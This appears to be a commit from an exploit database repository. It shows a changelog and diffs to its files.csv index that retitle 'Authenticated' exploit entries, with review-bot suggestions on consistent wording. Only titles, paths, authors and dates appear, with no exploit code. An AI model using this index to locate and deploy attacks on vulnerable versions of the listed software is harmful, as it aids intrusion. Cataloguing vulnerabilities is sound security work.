DB: 2016-09-10
3 new exploits

freeSSHd 1.2.1 - Remote Stack Overflow PoC (Authenticated)
freeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated
freeSSHd 1.2.1 - (Authenticated) Remote SEH Overflow
freeSSHd 1.2.1 - Authenticated Remote SEH Overflow
Debian OpenSSH - (Authenticated) Remote SELinux Privilege Elevation Exploit
Debian OpenSSH - Authenticated Remote SELinux Privilege Elevation Exploit
AvailScript Jobs Portal Script - (Authenticated) (jid) SQL Injection
AvailScript Jobs Portal Script - Authenticated (jid) SQL Injection
AvailScript Jobs Portal Script - (Authenticated) Arbitrary File Upload
AvailScript Jobs Portal Script - Authenticated Arbitrary File Upload
Serv-U 7.3 - (Authenticated) (stou con:1) Denial of Service
Serv-U 7.3 - (Authenticated) Remote FTP File Replacement
Serv-U 7.3 - Authenticated (stou con:1) Denial of Service
Serv-U 7.3 - Authenticated Remote FTP File Replacement
freeSSHd 1.2.1 - (Authenticated) SFTP rename Remote Buffer Overflow PoC
freeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow PoC
LoudBlog 0.8.0a - (Authenticated) (ajax.php) SQL Injection
LoudBlog 0.8.0a - Authenticated (ajax.php) SQL Injection
freeSSHd 1.2.1 - (Authenticated) SFTP realpath Remote Buffer Overflow PoC
freeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow PoC
Hannon Hill Cascade Server - (Authenticated) Command Execution
Hannon Hill Cascade Server - Authenticated Command Execution
Telnet-Ftp Service Server 1.x - (Authenticated) Multiple Vulnerabilities
Telnet-Ftp Service Server 1.x - Authenticated Multiple Vulnerabilities
Femitter FTP Server 1.x - (Authenticated) Multiple Vulnerabilities
Femitter FTP Server 1.x - Authenticated Multiple Vulnerabilities
Cpanel - (Authenticated) (lastvisit.html domain) Arbitrary File Disclosure
Cpanel - Authenticated (lastvisit.html domain) Arbitrary File Disclosure
MySQL 5.0.45 - (Authenticated) COM_CREATE_DB Format String PoC
MySQL 5.0.45 - Authenticated COM_CREATE_DB Format String PoC
FtpXQ FTP Server 3.0 - (Authenticated) Remote Denial of Service
FtpXQ FTP Server 3.0 - Authenticated Remote Denial of Service
NetAccess IP3 - (Authenticated) (ping option) Command Injection
NetAccess IP3 - Authenticated (ping option) Command Injection
Novell eDirectory 8.8 SP5 - (Authenticated) Remote Buffer Overflow
Novell eDirectory 8.8 SP5 - Authenticated Remote Buffer Overflow
Apache Axis2 Administration console - (Authenticated) Cross-Site Scripting
Apache Axis2 Administration console - Authenticated Cross-Site Scripting
Easy FTP Server 1.7.0.11 - (Authenticated) 'MKD' Command Remote Buffer Overflow
Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow
Easy FTP Server 1.7.0.11 - Authenticated 'MKD' Command Remote Buffer Overflow
Easy FTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow
Easy FTP Server 1.7.0.11 - (Authenticated) 'CWD' Command Remote Buffer Overflow
Easy FTP Server 1.7.0.11 - Authenticated 'CWD' Command Remote Buffer Overflow
Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow (Metasploit)
Easy FTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow (Metasploit)
UPlusFTP Server 1.7.1.01 - (Authenticated) HTTP Remote Buffer Overflow
UPlusFTP Server 1.7.1.01 - Authenticated HTTP Remote Buffer Overflow
Easy FTP Server 1.7.0.11 - (Authenticated) Multiple Commands Remote Buffer Overflow
Easy FTP Server 1.7.0.11 - Authenticated Multiple Commands Remote Buffer Overflow
ActFax Server FTP 4.25 Build 0221 (2010-02-11) - (Authenticated) Remote Buffer Overflow
ActFax Server FTP 4.25 Build 0221 (2010-02-11) - Authenticated Remote Buffer Overflow
ActFax Server FTP - (Authenticated) Remote Buffer Overflow
ActFax Server FTP - Authenticated Remote Buffer Overflow
Oracle Database - Protocol Authentication Bypass
Oracle Database - Protocol Authentication Bypass
IRIS Citations Management Tool - (Authenticated) Remote Command Execution
IRIS Citations Management Tool - Authenticated Remote Command Execution
Airmail 3.0.2 - Cross-Site Scripting
LamaHub 0.0.6.2 - Buffer Overflow
Vodafone Mobile Wifi - Reset Admin Password
Zabbix 2.0 - 3.0.3 - SQL Injection
Zabbix 2.0 < 3.0.3 - SQL Injection
Acuity CMS 2.6.2 - (ASP ) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter Arbitrary File Upload / Code Execution
Acuity CMS 2.6.2 - (ASP) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter Arbitrary File Upload / Code Execution
GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution
GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution
Alfresco - /proxy endpoint Parameter Server Side Request Forgery (SSRF)
Alfresco - /cmisbrowser url Parameter Server Side Request Forgery (SSRF)
Alfresco - /proxy endpoint Parameter Server Side Request Forgery
Alfresco - /cmisbrowser url Parameter Server Side Request Forgery
vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery (SSRF)
vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery
parent 0be1ea959a
commit 7607be84a3
5 changed files with 289 additions and 46 deletions
73
files.csv
|
@ -5335,7 +5335,7 @@ id,file,description,date,author,platform,type,port
|
|||
5706,platforms/php/webapps/5706.php,"EasyWay CMS - 'index.php mid' SQL Injection",2008-05-31,Lidloses_Auge,php,webapps,0
|
||||
5707,platforms/php/webapps/5707.txt,"Social Site Generator - (path) Remote File Inclusion",2008-05-31,vBmad,php,webapps,0
|
||||
5708,platforms/php/webapps/5708.txt,"Joomla Component prayercenter 1.4.9 - 'id' SQL Injection",2008-05-31,His0k4,php,webapps,0
|
||||
5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Remote Stack Overflow PoC (Authenticated)",2008-05-31,securfrog,windows,dos,0
|
||||
5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated",2008-05-31,securfrog,windows,dos,0
|
||||
5710,platforms/php/webapps/5710.pl,"Joomla Component com_biblestudy 1.5.0 - 'id' SQL Injection",2008-05-31,Stack,php,webapps,0
|
||||
5711,platforms/php/webapps/5711.txt,"Social Site Generator 2.0 - Multiple Remote File Disclosure Vulnerabilities",2008-06-01,Stack,php,webapps,0
|
||||
5712,platforms/multiple/dos/5712.pl,"Samba (client) - receive_smb_raw() Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0
|
||||
|
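Review bot: The new title for id 5709 only drops the parentheses and leaves the qualifier at the end ("Remote Stack Overflow PoC Authenticated"), while the other renames in this commit move it in front of the vulnerability class, as in 5751 "Authenticated Remote SEH Overflow". Suggest "freeSSHd 1.2.1 - Authenticated Remote Stack Overflow PoC" so the description field reads the same way across rows and one search pattern matches all of them.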
@ -5375,7 +5375,7 @@ id,file,description,date,author,platform,type,port
|
|||
5748,platforms/php/webapps/5748.txt,"Joomla Component JoomlaDate - (user) SQL Injection",2008-06-05,His0k4,php,webapps,0
|
||||
5749,platforms/multiple/dos/5749.pl,"Asterisk - (SIP channel driver / in pedantic mode) Remote Crash",2008-06-05,"Armando Oliveira",multiple,dos,0
|
||||
5750,platforms/windows/remote/5750.html,"Black Ice Software Inc Barcode SDK - 'BIDIB.ocx' Multiple Vulnerabilities",2008-06-05,shinnai,windows,remote,0
|
||||
5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - (Authenticated) Remote SEH Overflow",2008-06-06,ryujin,windows,remote,22
|
||||
5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - Authenticated Remote SEH Overflow",2008-06-06,ryujin,windows,remote,22
|
||||
5752,platforms/php/webapps/5752.pl,"Joomla Component GameQ 4.0 - SQL Injection",2008-06-07,His0k4,php,webapps,0
|
||||
5753,platforms/asp/webapps/5753.txt,"JiRo?s FAQ Manager (read.asp fID) 1.0 - SQL Injection",2008-06-08,Zigma,asp,webapps,0
|
||||
5754,platforms/php/webapps/5754.txt,"phpinv 0.8.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-08,"CWH Underground",php,webapps,0
|
||||
|
@ -5709,7 +5709,7 @@ id,file,description,date,author,platform,type,port
|
|||
6090,platforms/windows/dos/6090.html,"PPMate PPMedia Class - ActiveX Control Buffer Overflow (PoC)",2008-07-17,"Guido Landi",windows,dos,0
|
||||
6091,platforms/php/webapps/6091.txt,"PHPHoo3 <= 5.2.6 - (PHPHoo3.php viewCat) SQL Injection",2008-07-17,Mr.SQL,php,webapps,0
|
||||
6092,platforms/php/webapps/6092.txt,"Alstrasoft Video Share Enterprise 4.5.1 - (UID) SQL Injection",2008-07-17,"Hussin X",php,webapps,0
|
||||
6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - (Authenticated) Remote SELinux Privilege Elevation Exploit",2008-07-17,eliteboy,linux,remote,0
|
||||
6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - Authenticated Remote SELinux Privilege Elevation Exploit",2008-07-17,eliteboy,linux,remote,0
|
||||
6095,platforms/php/webapps/6095.pl,"Alstrasoft Article Manager Pro 1.6 - Blind SQL Injection",2008-07-17,GoLd_M,php,webapps,0
|
||||
6096,platforms/php/webapps/6096.txt,"preCMS 1 - 'index.php' SQL Injection",2008-07-17,Mr.SQL,php,webapps,0
|
||||
6097,platforms/php/webapps/6097.txt,"Artic Issue Tracker 2.0.0 - (index.php filter) SQL Injection",2008-07-17,QTRinux,php,webapps,0
|
||||
|
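Review bot: Row 6094 is retitled but keeps "Privilege Elevation Exploit", whereas other rows in this file use "Privilege Escalation" with no trailing "Exploit" (8250 and 9082, for example). Since the description is already being edited, normalise the wording in the same pass: "Debian OpenSSH - Authenticated Remote SELinux Privilege Escalation".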
@ -5997,7 +5997,7 @@ id,file,description,date,author,platform,type,port
|
|||
6413,platforms/php/webapps/6413.txt,"Zanfi CMS lite 1.2 - Multiple Local File Inclusion",2008-09-10,SirGod,php,webapps,0
|
||||
6414,platforms/windows/remote/6414.html,"Peachtree Accounting 2004 - 'PAWWeb11.ocx' ActiveX Insecure Method",2008-09-10,"Jeremy Brown",windows,remote,0
|
||||
6416,platforms/php/webapps/6416.txt,"Libera CMS 1.12 - 'cookie' SQL Injection",2008-09-10,StAkeR,php,webapps,0
|
||||
6417,platforms/php/webapps/6417.txt,"AvailScript Jobs Portal Script - (Authenticated) (jid) SQL Injection",2008-09-10,InjEctOr5,php,webapps,0
|
||||
6417,platforms/php/webapps/6417.txt,"AvailScript Jobs Portal Script - Authenticated (jid) SQL Injection",2008-09-10,InjEctOr5,php,webapps,0
|
||||
6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - 'FCKeditor' Arbitrary File Upload",2008-09-10,reptil,php,webapps,0
|
||||
6420,platforms/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,asp,webapps,0
|
||||
6421,platforms/php/webapps/6421.php,"WordPress 2.6.1 - (SQL Column Truncation) Admin Takeover Exploit",2008-09-10,iso^kpsbr,php,webapps,0
|
||||
|
@ -6089,7 +6089,7 @@ id,file,description,date,author,platform,type,port
|
|||
6511,platforms/php/webapps/6511.txt,"6rbScript 3.3 - (singerid) SQL Injection",2008-09-21,"Hussin X",php,webapps,0
|
||||
6512,platforms/php/webapps/6512.txt,"Diesel Job Site - (job_id) Blind SQL Injection",2008-09-21,Stack,php,webapps,0
|
||||
6513,platforms/php/webapps/6513.txt,"Rianxosencabos CMS 0.9 - Arbitrary Add Admin",2008-09-21,"CWH Underground",php,webapps,0
|
||||
6514,platforms/php/webapps/6514.txt,"AvailScript Jobs Portal Script - (Authenticated) Arbitrary File Upload",2008-09-21,InjEctOr5,php,webapps,0
|
||||
6514,platforms/php/webapps/6514.txt,"AvailScript Jobs Portal Script - Authenticated Arbitrary File Upload",2008-09-21,InjEctOr5,php,webapps,0
|
||||
6515,platforms/windows/dos/6515.c,"DESlock+ 3.2.7 - (vdlptokn.sys) Local Denial of Service",2008-09-21,"NT Internals",windows,dos,0
|
||||
6516,platforms/php/webapps/6516.txt,"e107 Plugin Image Gallery 0.9.6.2 - (image) SQL Injection",2008-09-21,boom3rang,php,webapps,0
|
||||
6517,platforms/php/webapps/6517.txt,"Netartmedia Jobs Portal 1.3 - Multiple SQL Injections",2008-09-21,"Encrypt3d.M!nd ",php,webapps,0
|
||||
|
@ -6232,8 +6232,8 @@ id,file,description,date,author,platform,type,port
|
|||
6657,platforms/php/webapps/6657.pl,"IP Reg 0.4 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0
|
||||
6658,platforms/windows/dos/6658.txt,"VBA32 Personal AntiVirus 3.12.8.x - (malformed archive) Denial of Service",2008-10-03,LiquidWorm,windows,dos,0
|
||||
6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script - 'arsaprint.php id' SQL Injection",2008-10-03,"Hussin X",php,webapps,0
|
||||
6660,platforms/windows/dos/6660.txt,"Serv-U 7.3 - (Authenticated) (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0
|
||||
6661,platforms/windows/remote/6661.txt,"Serv-U 7.3 - (Authenticated) Remote FTP File Replacement",2008-10-03,dmnt,windows,remote,0
|
||||
6660,platforms/windows/dos/6660.txt,"Serv-U 7.3 - Authenticated (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0
|
||||
6661,platforms/windows/remote/6661.txt,"Serv-U 7.3 - Authenticated Remote FTP File Replacement",2008-10-03,dmnt,windows,remote,0
|
||||
6662,platforms/php/webapps/6662.pl,"AdaptCMS Lite 1.3 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0
|
||||
6663,platforms/php/webapps/6663.txt,"CCMS 3.1 - (skin) Multiple Local File Inclusion",2008-10-03,SirGod,php,webapps,0
|
||||
6664,platforms/php/webapps/6664.txt,"Kwalbum 2.0.2 - Arbitrary File Upload",2008-10-03,"CWH Underground",php,webapps,0
|
||||
|
@ -6368,18 +6368,18 @@ id,file,description,date,author,platform,type,port
|
|||
6797,platforms/php/webapps/6797.txt,"LightBlog 9.8 - (GET & POST & COOKIE) Multiple Local File Inclusion Vulnerabilities",2008-10-21,JosS,php,webapps,0
|
||||
6798,platforms/windows/local/6798.pl,"VLC Media Player - '.TY' File Stack Based Buffer Overflow",2008-10-21,"Guido Landi",windows,local,0
|
||||
6799,platforms/php/webapps/6799.txt,"ShopMaker 1.0 - (product.php id) SQL Injection",2008-10-21,"Hussin X",php,webapps,0
|
||||
6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 - (Authenticated) SFTP rename Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0
|
||||
6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0
|
||||
6801,platforms/windows/remote/6801.txt,"Opera 9.60 - Persistent Cross-Site Scripting",2008-10-22,"Roberto Suggi Liverani",windows,remote,0
|
||||
6802,platforms/php/webapps/6802.txt,"Joomla Component Daily Message 1.0.3 - 'id' SQL Injection",2008-10-22,H!tm@N,php,webapps,0
|
||||
6803,platforms/php/webapps/6803.txt,"Iamma Simple Gallery 1.0/2.0 - Arbitrary File Upload",2008-10-22,x0r,php,webapps,0
|
||||
6804,platforms/windows/remote/6804.pl,"GoodTech SSH - (SSH_FXP_OPEN) Remote Buffer Overflow",2008-10-22,r0ut3r,windows,remote,22
|
||||
6805,platforms/multiple/dos/6805.txt,"LibSPF2 < 1.2.8 - DNS TXT Record Parsing Bug Heap Overflow (PoC)",2008-10-22,"Dan Kaminsky",multiple,dos,0
|
||||
6806,platforms/php/webapps/6806.txt,"phpcrs 2.06 - (importFunction) Local File Inclusion",2008-10-22,Pepelux,php,webapps,0
|
||||
6808,platforms/php/webapps/6808.pl,"LoudBlog 0.8.0a - (Authenticated) (ajax.php) SQL Injection",2008-10-22,Xianur0,php,webapps,0
|
||||
6808,platforms/php/webapps/6808.pl,"LoudBlog 0.8.0a - Authenticated (ajax.php) SQL Injection",2008-10-22,Xianur0,php,webapps,0
|
||||
6809,platforms/php/webapps/6809.txt,"Joomla Component ionFiles 4.4.2 - File Disclosure",2008-10-22,Vrs-hCk,php,webapps,0
|
||||
6810,platforms/asp/webapps/6810.txt,"DorsaCMS - 'ShowPage.aspx' SQL Injection",2008-10-22,syst3m_f4ult,asp,webapps,0
|
||||
6811,platforms/php/webapps/6811.txt,"YDC - 'kdlist.php cat' SQL Injection",2008-10-22,"Hussin X",php,webapps,0
|
||||
6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 - (Authenticated) SFTP realpath Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0
|
||||
6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow PoC",2008-10-22,"Jeremy Brown",windows,dos,0
|
||||
6813,platforms/windows/remote/6813.html,"Opera 9.52/9.60 - Persistent Cross-Site Scripting Code Execution (PoC)",2008-10-23,"Aviv Raff",windows,remote,0
|
||||
6814,platforms/php/webapps/6814.php,"CSPartner 1.0 - (Delete All Users / SQL Injection) Remote Exploit",2008-10-23,StAkeR,php,webapps,0
|
||||
6815,platforms/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 - (opendir) Denial of Service",2008-10-23,"Jeremy Brown",windows,dos,0
|
||||
|
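Review bot: In the new title for 6808 the affected file is still wrapped in parentheses ("Authenticated (ajax.php) SQL Injection"), while neighbouring rows in this hunk quote the file name instead ('ShowPage.aspx' in 6810, 'kdlist.php cat' in 6811). If the aim of this pass is to drop parenthesised qualifiers, quote the file here as well, for example "LoudBlog 0.8.0a - Authenticated 'ajax.php' SQL Injection", so the row does not need a second edit later.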
@ -7759,7 +7759,7 @@ id,file,description,date,author,platform,type,port
|
|||
8244,platforms/php/webapps/8244.txt,"Bloginator 1a - SQL Injection / Command Injection (via Cookie Bypass Exploit)",2009-03-19,Fireshot,php,webapps,0
|
||||
8245,platforms/multiple/dos/8245.c,"SW-HTTPD Server 0.x - Remote Denial of Service",2009-03-19,"Jonathan Salwan",multiple,dos,0
|
||||
8246,platforms/windows/local/8246.pl,"Chasys Media Player - '.lst Playlist' Local Buffer Overflow",2009-03-19,zAx,windows,local,0
|
||||
8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - (Authenticated) Command Execution",2009-03-19,"Emory University",cgi,webapps,0
|
||||
8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - Authenticated Command Execution",2009-03-19,"Emory University",cgi,webapps,0
|
||||
8248,platforms/windows/remote/8248.py,"POP Peeper 3.4.0.0 - (From) Remote Buffer Overflow (SEH)",2009-03-20,His0k4,windows,remote,0
|
||||
8249,platforms/windows/local/8249.php,"BS.Player 2.34 Build 980 - '.bsl' Local Buffer Overflow (SEH)",2009-03-20,Nine:Situations:Group,windows,local,0
|
||||
8250,platforms/windows/local/8250.txt,"CloneCD/DVD ElbyCDIO.sys < 6.0.3.2 - Privilege Escalation",2009-03-20,"NT Internals",windows,local,0
|
||||
|
@ -7785,7 +7785,7 @@ id,file,description,date,author,platform,type,port
|
|||
8270,platforms/windows/local/8270.pl,"eXeScope 6.50 - Local Buffer Overflow",2009-03-23,Koshi,windows,local,0
|
||||
8271,platforms/php/webapps/8271.php,"Pluck CMS 4.6.1 - (module_pages_site.php post) Local File Inclusion",2009-03-23,"Alfons Luja",php,webapps,0
|
||||
8272,platforms/php/webapps/8272.pl,"Codice CMS 2 - SQL Command Execution",2009-03-23,darkjoker,php,webapps,0
|
||||
8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - (Authenticated) Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0
|
||||
8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - Authenticated Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0
|
||||
8274,platforms/windows/local/8274.pl,"POP Peeper 3.4.0.0 - '.eml' Universal Overwrite (SEH)",2009-03-23,Stack,windows,local,0
|
||||
8275,platforms/windows/local/8275.pl,"POP Peeper 3.4.0.0 - '.html' Universal Overwrite (SEH)",2009-03-23,Stack,windows,local,0
|
||||
8276,platforms/php/webapps/8276.pl,"Syzygy CMS 0.3 - Local File Inclusion / SQL Command Injection",2009-03-23,Osirys,php,webapps,0
|
||||
|
@ -7795,7 +7795,7 @@ id,file,description,date,author,platform,type,port
|
|||
8280,platforms/windows/local/8280.txt,"Adobe Acrobat Reader - JBIG2 Universal Exploit (Bind Shell Port 5500)",2009-03-24,"Black Security",windows,local,0
|
||||
8281,platforms/windows/dos/8281.txt,"Microsoft GdiPlus - EMF GpFont.SetData Integer Overflow (PoC)",2009-03-24,"Black Security",windows,dos,0
|
||||
8282,platforms/php/webapps/8282.txt,"SurfMyTV Script 1.0 - (view.php id) SQL Injection",2009-03-24,x0r,php,webapps,0
|
||||
8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - (Authenticated) Multiple Vulnerabilities",2009-03-24,"Jonathan Salwan",windows,remote,0
|
||||
8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - Authenticated Multiple Vulnerabilities",2009-03-24,"Jonathan Salwan",windows,remote,0
|
||||
8284,platforms/windows/remote/8284.pl,"IncrediMail 5.86 - (Cross-Site Scripting) Script Execution Exploit",2009-03-24,"Bui Quang Minh",windows,remote,0
|
||||
8285,platforms/multiple/dos/8285.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (1)",2009-03-25,"Guido Landi",multiple,dos,0
|
||||
8287,platforms/php/webapps/8287.php,"PHPizabi 0.848b C1 HFP1-3 - Arbitrary File Upload",2009-03-25,EgiX,php,webapps,0
|
||||
|
@ -8525,7 +8525,7 @@ id,file,description,date,author,platform,type,port
|
|||
9036,platforms/php/webapps/9036.txt,"PHP-Sugar 0.80 - (index.php t) Local File Inclusion",2009-06-29,ahmadbady,php,webapps,0
|
||||
9037,platforms/php/webapps/9037.txt,"Clicknet CMS 2.1 - (side) Arbitrary File Disclosure",2009-06-29,"ThE g0bL!N",php,webapps,0
|
||||
9038,platforms/windows/local/9038.py,"HT-MP3Player 1.0 - '.ht3' Universal Buffer Overflow (SEH)",2009-06-29,His0k4,windows,local,0
|
||||
9039,platforms/multiple/remote/9039.txt,"Cpanel - (Authenticated) (lastvisit.html domain) Arbitrary File Disclosure",2009-06-29,SecurityRules,multiple,remote,0
|
||||
9039,platforms/multiple/remote/9039.txt,"Cpanel - Authenticated (lastvisit.html domain) Arbitrary File Disclosure",2009-06-29,SecurityRules,multiple,remote,0
|
||||
9040,platforms/php/webapps/9040.txt,"Joomla com_bookflip - (book_id) SQL Injection",2009-06-29,boom3rang,php,webapps,0
|
||||
9041,platforms/php/webapps/9041.txt,"Audio Article Directory - (file) Remote File Disclosure",2009-06-29,"ThE g0bL!N",php,webapps,0
|
||||
9042,platforms/php/webapps/9042.pl,"NEWSolved 1.1.6 - (login grabber) Multiple SQL Injection",2009-06-29,jmp-esp,php,webapps,0
|
||||
|
@ -8568,7 +8568,7 @@ id,file,description,date,author,platform,type,port
|
|||
9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Privilege Escalation",2009-07-09,"Patroklos Argyroudis",freebsd,local,0
|
||||
9083,platforms/linux/local/9083.c,"Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off-by-One Local Exploit",2009-07-09,sgrakkyu,linux,local,0
|
||||
9084,platforms/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution (PoC)",2009-07-09,"laurent gaffié ",windows,dos,0
|
||||
9085,platforms/multiple/dos/9085.txt,"MySQL 5.0.45 - (Authenticated) COM_CREATE_DB Format String PoC",2009-07-09,kingcope,multiple,dos,0
|
||||
9085,platforms/multiple/dos/9085.txt,"MySQL 5.0.45 - Authenticated COM_CREATE_DB Format String PoC",2009-07-09,kingcope,multiple,dos,0
|
||||
9086,platforms/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b - Arbitrary File Upload",2009-07-09,"ThE g0bL!N",php,webapps,0
|
||||
9087,platforms/php/webapps/9087.php,"Nwahy Dir 2.1 - Arbitrary Change Admin Password",2009-07-09,rEcruit,php,webapps,0
|
||||
9088,platforms/php/webapps/9088.txt,"Glossword 1.8.11 - Arbitrary Uninstall / Install",2009-07-09,Evil-Cod3r,php,webapps,0
|
||||
|
@ -9124,7 +9124,7 @@ id,file,description,date,author,platform,type,port
|
|||
9661,platforms/windows/local/9661.c,"MP3 Studio 1.0 - '.m3u' Local Buffer Overflow",2009-09-14,dmc,windows,local,0
|
||||
9662,platforms/windows/remote/9662.c,"IPSwitch IMAP Server 9.20 - Remote Buffer Overflow",2009-09-14,dmc,windows,remote,143
|
||||
9663,platforms/windows/remote/9663.py,"Mozilla Firefox 2.0.0.16 - UTF-8 URL Remote Buffer Overflow",2009-09-14,dmc,windows,remote,0
|
||||
9664,platforms/windows/dos/9664.py,"FtpXQ FTP Server 3.0 - (Authenticated) Remote Denial of Service",2009-09-14,PLATEN,windows,dos,0
|
||||
9664,platforms/windows/dos/9664.py,"FtpXQ FTP Server 3.0 - Authenticated Remote Denial of Service",2009-09-14,PLATEN,windows,dos,0
|
||||
9665,platforms/php/webapps/9665.pl,"PHP Pro Bid - Blind SQL Injection",2009-09-14,NoGe,php,webapps,0
|
||||
9666,platforms/hardware/dos/9666.php,"Apple Safari IPhone - (using tel:) Remote Crash",2009-09-14,cloud,hardware,dos,0
|
||||
9667,platforms/windows/dos/9667.c,"Cerberus FTP Server 3.0.3 - Remote Denial of Service",2009-09-14,"Single Eye",windows,dos,0
|
||||
|
@ -9146,7 +9146,7 @@ id,file,description,date,author,platform,type,port
|
|||
9685,platforms/windows/dos/9685.txt,"EasyMail Quicksoft 6.0.2.0 - (CreateStore) ActiveX Code Execution (PoC)",2009-09-15,"Francis Provencher",windows,dos,0
|
||||
9686,platforms/windows/dos/9686.py,"VLC Media Player < 0.9.6 - (CUE) Local Buffer Overflow (PoC)",2009-09-15,Dr_IDE,windows,dos,0
|
||||
9687,platforms/windows/local/9687.py,"SAP Player 0.9 - '.pla' Universal Local Buffer Overflow (SEH)",2009-09-15,mr_me,windows,local,0
|
||||
9688,platforms/hardware/local/9688.txt,"NetAccess IP3 - (Authenticated) (ping option) Command Injection",2009-09-15,r00t,hardware,local,0
|
||||
9688,platforms/hardware/local/9688.txt,"NetAccess IP3 - Authenticated (ping option) Command Injection",2009-09-15,r00t,hardware,local,0
|
||||
9689,platforms/windows/dos/9689.pl,"MP3 Collector 2.3 - '.m3u' Local Crash (PoC)",2009-09-15,zAx,windows,dos,0
|
||||
9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Request Remote Buffer Overflow (SEH) Universal",2009-09-15,hack4love,windows,remote,6660
|
||||
9691,platforms/windows/dos/9691.pl,"DJ Studio Pro 4.2 - '.pls' Local Crash",2009-09-15,prodigy,windows,dos,0
|
||||
|
@ -10148,7 +10148,7 @@ id,file,description,date,author,platform,type,port
|
|||
11019,platforms/php/webapps/11019.txt,"MobPartner Counter - Arbitrary File Upload",2010-01-06,"wlhaan hacker",php,webapps,0
|
||||
11020,platforms/windows/dos/11020.pl,"GOM Audio - Local Crash (PoC)",2010-01-06,applicationlayer,windows,dos,0
|
||||
11021,platforms/windows/dos/11021.txt,"Flashget 3.x - IEHelper Remote Exec (PoC)",2010-01-06,superli,windows,dos,0
|
||||
11022,platforms/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - (Authenticated) Remote Buffer Overflow",2010-01-06,"His0k4 and Simo36",novell,remote,0
|
||||
11022,platforms/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - Authenticated Remote Buffer Overflow",2010-01-06,"His0k4 and Simo36",novell,remote,0
|
||||
11023,platforms/asp/webapps/11023.txt,"Erolife AjxGaleri VT - Database Disclosure",2010-01-06,LionTurk,asp,webapps,0
|
||||
11024,platforms/php/webapps/11024.txt,"Joomla Component com_perchagallery - SQL Injection",2010-01-06,FL0RiX,php,webapps,0
|
||||
11025,platforms/php/webapps/11025.txt,"AWCM - Database Disclosure",2010-01-06,alnjm33,php,webapps,0
|
||||
|
@ -11581,7 +11581,7 @@ id,file,description,date,author,platform,type,port
|
|||
12686,platforms/php/webapps/12686.txt,"Online University - (Authentication Bypass) SQL Injection",2010-05-21,"cr4wl3r ",php,webapps,0
|
||||
12687,platforms/windows/dos/12687.pl,"WinDirectAudio 1.0 - '.wav' (PoC)",2010-05-21,ahwak2000,windows,dos,0
|
||||
12688,platforms/php/webapps/12688.txt,"JV2 Folder Gallery 3.1 - 'gallery.php' Remote File Inclusion",2010-05-21,"Sn!pEr.S!Te Hacker",php,webapps,0
|
||||
12689,platforms/multiple/webapps/12689.txt,"Apache Axis2 Administration console - (Authenticated) Cross-Site Scripting",2010-05-21,"Richard Brain",multiple,webapps,0
|
||||
12689,platforms/multiple/webapps/12689.txt,"Apache Axis2 Administration console - Authenticated Cross-Site Scripting",2010-05-21,"Richard Brain",multiple,webapps,0
|
||||
12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - 'FCKeditor' Arbitrary File Upload",2010-05-21,Ma3sTr0-Dz,php,webapps,0
|
||||
12691,platforms/php/webapps/12691.txt,"Online Job Board - (Authentication Bypass) SQL Injection",2010-05-21,"cr4wl3r ",php,webapps,0
|
||||
